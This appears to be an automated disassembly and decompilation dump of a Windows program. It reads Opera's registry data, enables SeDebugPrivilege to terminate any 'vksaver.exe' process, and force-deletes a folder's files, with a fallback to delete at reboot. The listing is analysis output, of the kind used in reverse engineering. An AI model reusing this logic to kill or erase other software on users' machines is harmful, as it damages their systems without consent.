push [ebp-0x874]
mov edi, eax
call [advapi32.RegCloseKey]
mov esi, [ebp-0x878]
test esi, esi
jz .5
test edi, edi
jnz .5
xor edx, edx
xor ecx, ecx
shr esi, 0x01
jz .4
jmp .1
.1:
movzx edi, word ptr [ebp+ecx*2-0x210]
cmp edi, 0x22
jnz .2
inc edx
jmp .3
.2:
mov eax, ecx
sub eax, edx
mov [ebp+eax*2-0x418], di
.3:
inc ecx
cmp ecx, esi
jb .1
.4:
sub esi, edx
add esi, esi
cmp esi, 0x208
jnb .6
xor eax, eax
mov [ebp+esi*1-0x418], ax
lea eax, [ebp-0x870]
push eax
lea eax, [ebp-0x418]
push eax
call [kernel32.FindFirstFileW]
cmp eax, 0xFFFFFFFF
jz .5
push eax
call [kernel32.FindClose]
mov al, 0x01
pop edi
pop esi
mov ecx, [ebp-0x04]
xor ecx, ebp
call sub_406beb()
mov esp, ebp
pop ebp
ret
.5:
mov ecx, [ebp-0x04]
pop edi
xor ecx, ebp
xor al, al
pop esi
call sub_406beb()
mov esp, ebp
pop ebp
ret
.6:
call ___report_rangecheckfailure()
}
/* DISPLAY WARNING: Type casts are NOT being printed */
void sub_4010b0(void)
{
code *pcVar1;
int32_t iVar2;
uint32_t uVar3;
uint32_t uVar4;
undefined4 uStack_880;
uint32_t uStack_87c;
int32_t iStack_878;
undefined auStack_874 [592];
undefined auStack_624 [520];
int16_t aiStack_41c [260];
int16_t aiStack_214 [262];
uint32_t uStack_8;
uStack_8 = [0x0x46f000#SecurityCookie] ^ &stack0xfffffffc;
(*shell32.SHGetFolderPathW)(0, 0x1a, 0, 0, auStack_624);
(*user32.wsprintfW)(aiStack_214, "%s\\Opera\\Opera\\operaprefs.ini", auStack_624);
iVar2 = (*kernel32.FindFirstFileW)(aiStack_214, auStack_874);
if (iVar2 != -1) {
(*kernel32.FindClose)(iVar2);
iStack_878 = 0;
(*advapi32.RegOpenKeyExW)(0x80000001, "Software\\Opera Software", 0, 0x20019, &iStack_878);
if (iStack_878 != 0) {
uStack_880 = 1;
uStack_87c = 0x104;
iVar2 = (*advapi32.RegQueryValueExW)(iStack_878, "Last CommandLine v2", 0, &uStack_880, aiStack_214, &uStack_87c);
(*advapi32.RegCloseKey)(iStack_878);
if ((uStack_87c != 0) && (iVar2 == 0)) {
iVar2 = 0;
uVar3 = 0;
uVar4 = uStack_87c >> 1;
if (uVar4 != 0) {
do {
if (aiStack_214[uVar3] == 0x22) {
iVar2 = iVar2 + 1;
}
else {
aiStack_41c[uVar3 - iVar2] = aiStack_214[uVar3];
}
uVar3 = uVar3 + 1;
} while (uVar3 < uVar4);
}
if (0x207 < (uVar4 - iVar2) * 2) {
___report_rangecheckfailure();
pcVar1 = swi(3);
(*pcVar1)();
return;
}
aiStack_41c[uVar4 - iVar2] = 0;
iVar2 = (*kernel32.FindFirstFileW)(aiStack_41c, auStack_874);
if (iVar2 != -1) {
(*kernel32.FindClose)(iVar2);
sub_406beb();
return;
}
}
}
}
sub_406beb();
return;
}
0x403190 sub_403190 str 2 api 11 imm 13 Unknown
sub_403190() {
push ebp
mov ebp, esp
sub esp, 0x92C
mov eax, [0x46F000]
xor eax, ebp
mov [ebp-0x04], eax
push ebx
push esi
push edi
call [kernel32.GetCurrentProcessId]
mov esi, eax
lea eax, [ebp-0x520]
push eax
push 0x400
lea eax, [ebp-0x508]
push eax
mov [ebp-0x51C], esi
call [psapi.EnumProcesses]
lea eax, [ebp-0x524]
push eax
push 0x28
call [kernel32.GetCurrentProcess]
push eax
call [advapi32.OpenProcessToken]
test eax, eax
jz .1
lea eax, [ebp-0x514]
push eax
push "SeDebugPrivilege"
push 0x00
call [advapi32.LookupPrivilegeValueW]
push 0x00
push 0x00
push 0x00
lea eax, [ebp-0x518]
push eax
push 0x00
push [ebp-0x524]
mov dword ptr [ebp-0x518], 0x01
mov dword ptr [ebp-0x50C], 0x02
call [advapi32.AdjustTokenPrivileges]
.1:
xor edi, edi
test dword ptr [ebp-0x520], 0xFFFFFFFC
jbe .6
mov ebx, [kernel32.TerminateProcess]
jmp .2
jmp .2
.2:
mov eax, [ebp+edi*4-0x508]
cmp eax, esi
jz .5
push eax
push 0x00
push 0x411
call [kernel32.OpenProcess]
mov esi, eax
test esi, esi
jz .4
lea eax, [ebp-0x528]
push eax
push 0x400
lea eax, [ebp-0x928]
push eax
push esi
call [psapi.EnumProcessModules]
test eax, eax
jz .3
push 0x80
lea eax, [ebp-0x108]
push eax
push [ebp-0x928]
push esi
call [psapi.GetModuleBaseNameW]
lea eax, [ebp-0x108]
push 0x80
push eax
call __wcslwr_s()
lea eax, [ebp-0x108]
push "vksaver.exe"
push eax
call _wcsstr()
add esp, 0x10
test eax, eax
jz .3
push 0x00
push esi
call ebx
push 0x1F4
call [kernel32.Sleep]
.3:
push esi
call [kernel32.CloseHandle]
.4:
mov esi, [ebp-0x51C]
.5:
mov eax, [ebp-0x520]
inc edi
shr eax, 0x02
cmp edi, eax
jb .2
.6:
mov ecx, [ebp-0x04]
pop edi
pop esi
xor ecx, ebp
pop ebx
call sub_406beb()
mov esp, ebp
pop ebp
ret
}
/* DISPLAY WARNING: Type casts are NOT being printed */
void sub_403190(void)
{
code *pcVar1;
int32_t iVar2;
undefined4 uVar3;
int32_t iVar4;
uint32_t uVar5;
undefined4 auStack_92c [256];
undefined auStack_52c [4];
undefined4 uStack_528;
uint32_t uStack_524;
int32_t iStack_520;
undefined4 uStack_51c;
undefined auStack_518 [8];
undefined4 uStack_510;
int32_t aiStack_50c [256];
undefined auStack_10c [260];
uint32_t uStack_8;
uStack_8 = [0x0x46f000#SecurityCookie] ^ &stack0xfffffffc;
iVar2 = (*kernel32.GetCurrentProcessId)();
iStack_520 = iVar2;
(*psapi.EnumProcesses)(aiStack_50c, 0x400, &uStack_524);
uVar3 = (*kernel32.GetCurrentProcess)(0x28, &uStack_528);
iVar4 = (*advapi32.OpenProcessToken)(uVar3);
if (iVar4 != 0) {
(*advapi32.LookupPrivilegeValueW)(0, "SeDebugPrivilege", auStack_518);
uStack_51c = 1;
uStack_510 = 2;
(*advapi32.AdjustTokenPrivileges)(uStack_528, 0, &uStack_51c, 0, 0, 0);
}
pcVar1 = kernel32.TerminateProcess;
uVar5 = 0;
if ((uStack_524 & 0xfffffffc) != 0) {
do {
if ((aiStack_50c[uVar5] != iVar2) &&
(iVar4 = (*kernel32.OpenProcess)(0x411, 0, aiStack_50c[uVar5]), iVar2 = iStack_520, iVar4 != 0)) {
iVar2 = (*psapi.EnumProcessModules)(iVar4, auStack_92c, 0x400, auStack_52c);
if (iVar2 != 0) {
(*psapi.GetModuleBaseNameW)(iVar4, auStack_92c[0], auStack_10c, 0x80);
__wcslwr_s(auStack_10c, 0x80);
iVar2 = _wcsstr(auStack_10c, "vksaver.exe");
if (iVar2 != 0) {
(*pcVar1)(iVar4, 0);
(*kernel32.Sleep)(500);
}
}
(*kernel32.CloseHandle)(iVar4);
iVar2 = iStack_520;
}
uVar5 = uVar5 + 1;
} while (uVar5 < uStack_524 >> 2);
}
sub_406beb();
return;
}
0x4025E0 sub_4025e0 str 2 api 11 imm 9 Unknown
sub_4025e0() {
push ebp
mov ebp, esp
sub esp, 0xAB8
mov eax, [0x46F000]
xor eax, ebp
mov [ebp-0x08], eax
push ebx
push esi
mov ebx, ecx
push edi
lea edx, [ebp-0x60C]
mov esi, ebx
.1:
mov ax, [esi]
lea esi, [esi+0x02]
mov [edx], ax
add edx, 0x02
cmp word ptr [esi], 0x00
jnz .1
mov eax, 0x5C
cmp [esi-0x02], ax
jz .2
mov [edx], ax
mov [esi], eax
add edx, 0x02
.2:
mov ecx, 0x46B3B8
sub edx, ecx
lea esp, [esp]
.3:
movzx eax, word ptr [ecx]
mov [edx+ecx*1], ax
lea ecx, [ecx+0x02]
test ax, ax
jnz .3
lea eax, [ebp-0xAAC]
push eax
lea eax, [ebp-0x60C]
push eax
call [kernel32.FindFirstFileW]
mov [ebp-0xAB0], eax
cmp eax, 0xFFFFFFFF
jz .13
mov edi, [kernel32.MoveFileExW]
mov esi, ebx
lea eax, [ebp-0x40C]
sub esi, eax
.4:
movzx edx, word ptr [ebx]
lea eax, [ebp-0x40C]
jmp .5
.5:
movzx ecx, word ptr [esi+eax*1+0x02]
mov [eax], dx
add eax, 0x02
mov edx, ecx
test cx, cx
jnz .5
lea edx, [ebp-0xA80]
jmp .6
.6:
movzx ecx, word ptr [edx]
mov [eax], cx
lea edx, [edx+0x02]
lea eax, [eax+0x02]
test cx, cx
jnz .6
test byte ptr [ebp-0xAAC], 0x10
jnz .12
lea eax, [ebp-0x85C]
push eax
lea eax, [ebp-0x40C]
push eax
call [kernel32.FindFirstFileW]
cmp eax, 0xFFFFFFFF
jz .12
push eax
call [kernel32.FindClose]
lea eax, [ebp-0x40C]
push eax
call [kernel32.DeleteFileW]
test eax, eax
jnz .12
lea eax, [ebp-0x20C]
push eax
push 0x100
call [kernel32.GetTempPathW]
cmp word ptr [ebp-0x20C], 0x00
lea eax, [ebp-0x20C]
jz .8
lea esp, [esp]
.7:
add eax, 0x02
cmp word ptr [eax], 0x00
jnz .7
.8:
cmp word ptr [eax-0x02], 0x5C
jz .9
mov ecx, 0x5C
mov [eax], cx
.9:
lea eax, [ebp-0xAB8]
push eax
call [kernel32.GetSystemTimeAsFileTime]
mov eax, [ebp-0xAB8]
xor eax, [ebp-0xAB4]
push eax
lea eax, [ebp-0x20C]
push eax
lea eax, [ebp-0x80C]
push "%s%u.tmp"
push eax
call [user32.wsprintfW]
add esp, 0x10
lea eax, [ebp-0x80C]
push 0x01
push eax
lea eax, [ebp-0x40C]
push eax
call edi
test eax, eax
jnz .10
mov eax, [ebp-0xAB8]
xor eax, [ebp-0xAB4]
push eax
lea eax, [ebp-0x40C]
push eax
lea eax, [ebp-0x20C]
push "%s_%u.tmp"
push eax
call [user32.wsprintfW]
add esp, 0x10
lea eax, [ebp-0x20C]
push 0x01
push eax
lea eax, [ebp-0x40C]
push eax
call edi
test eax, eax
jz .12
lea eax, [ebp-0x20C]
jmp .11
.10:
lea eax, [ebp-0x80C]
.11:
push 0x04
push 0x00
push eax
call edi
.12:
lea eax, [ebp-0xAAC]
push eax
push [ebp-0xAB0]
call [kernel32.FindNextFileW]
test eax, eax
jnz .4
push [ebp-0xAB0]
call [kernel32.FindClose]
.13:
cmp byte ptr [ebp+0x08], 0x00
jnz .14
push ebx
call [kernel32.RemoveDirectoryW]
.14:
mov ecx, [ebp-0x08]
pop edi
pop esi
xor ecx, ebp
pop ebx
call sub_406beb()
mov esp, ebp
pop ebp
ret
}
/* DISPLAY WARNING: Type casts are NOT being printed */
void __thiscall sub_4025e0(undefined4 *param_1,char param_2)
{
undefined4 *puVar1;
int16_t iVar2;
code *pcVar3;
int32_t iVar4;
int16_t *piVar5;
int16_t iVar6;
undefined2 *puVar7;
undefined2 *puVar8;
int16_t *piVar9;
undefined4 *puVar10;
uint32_t uStack_abc;
uint32_t uStack_ab8;
int32_t iStack_ab4;
uint8_t auStack_ab0 [44];
int16_t aiStack_a84 [274];
undefined auStack_860 [80];
int16_t aiStack_810 [256];
undefined2 auStack_610 [256];
int16_t aiStack_410 [256];
int16_t iStack_210;
int16_t aiStack_20e [257];
uint32_t uStack_c;
uStack_c = [0x0x46f000#SecurityCookie] ^ &stack0xfffffffc;
puVar8 = auStack_610;
puVar1 = param_1;
do {
puVar10 = puVar1;
puVar7 = puVar8;
puVar1 = puVar10 + 2;
*puVar7 = *puVar10;
puVar8 = puVar7 + 1;
} while (*puVar1 != 0);
if (*puVar10 != 0x5c) {
*puVar8 = 0x5c;
*puVar1 = 0x5c;
puVar8 = puVar7 + 2;
}
piVar5 = 0x46b3b8;
do {
iVar6 = *piVar5;
*(puVar8 + -0x2359dc + piVar5) = iVar6;
piVar5 = piVar5 + 1;
} while (iVar6 != 0);
iStack_ab4 = (*kernel32.FindFirstFileW)(auStack_610, auStack_ab0);
pcVar3 = kernel32.MoveFileExW;
if (iStack_ab4 != -1) {
do {
piVar5 = aiStack_410;
iVar6 = *param_1;
do {
iVar2 = *(param_1 + (2 - aiStack_410) + piVar5);
*piVar5 = iVar6;
piVar5 = piVar5 + 1;
iVar6 = iVar2;
} while (iVar2 != 0);
piVar9 = aiStack_a84;
do {
iVar6 = *piVar9;
*piVar5 = iVar6;
piVar9 = piVar9 + 1;
piVar5 = piVar5 + 1;
} while (iVar6 != 0);
if (((auStack_ab0[0] & 0x10) == 0) &&
(iVar4 = (*kernel32.FindFirstFileW)(aiStack_410, auStack_860), iVar4 != -1)) {
(*kernel32.FindClose)(iVar4);
iVar4 = (*kernel32.DeleteFileW)(aiStack_410);
if (iVar4 == 0) {
(*kernel32.GetTempPathW)(0x100, &iStack_210);
piVar5 = &iStack_210;
iVar6 = iStack_210;
while (iVar6 != 0) {
piVar5 = piVar5 + 1;
iVar6 = *piVar5;
}
if (piVar5[-1] != 0x5c) {
*piVar5 = 0x5c;
}
(*kernel32.GetSystemTimeAsFileTime)(&uStack_abc);
(*user32.wsprintfW)(aiStack_810, "%s%u.tmp", &iStack_210, uStack_abc ^ uStack_ab8);
iVar4 = (*pcVar3)(aiStack_410, aiStack_810, 1);
if (iVar4 == 0) {
(*user32.wsprintfW)(&iStack_210, "%s_%u.tmp", aiStack_410, uStack_abc ^ uStack_ab8);
iVar4 = (*pcVar3)(aiStack_410, &iStack_210, 1);
if (iVar4 == 0) goto code_r0x004027d8;
piVar5 = &iStack_210;
}
else {
piVar5 = aiStack_810;
}
(*pcVar3)(piVar5, 0, 4);
}
}
code_r0x004027d8:
iVar4 = (*kernel32.FindNextFileW)(iStack_ab4, auStack_ab0);
} while (iVar4 != 0);
(*kernel32.FindClose)(iStack_ab4);
}
if (param_2 == '\0') {
(*kernel32.RemoveDirectoryW)(param_1);
}
sub_406beb();
return;
}
| Library | Functions |
|---|---|
| runtime/other | 151 |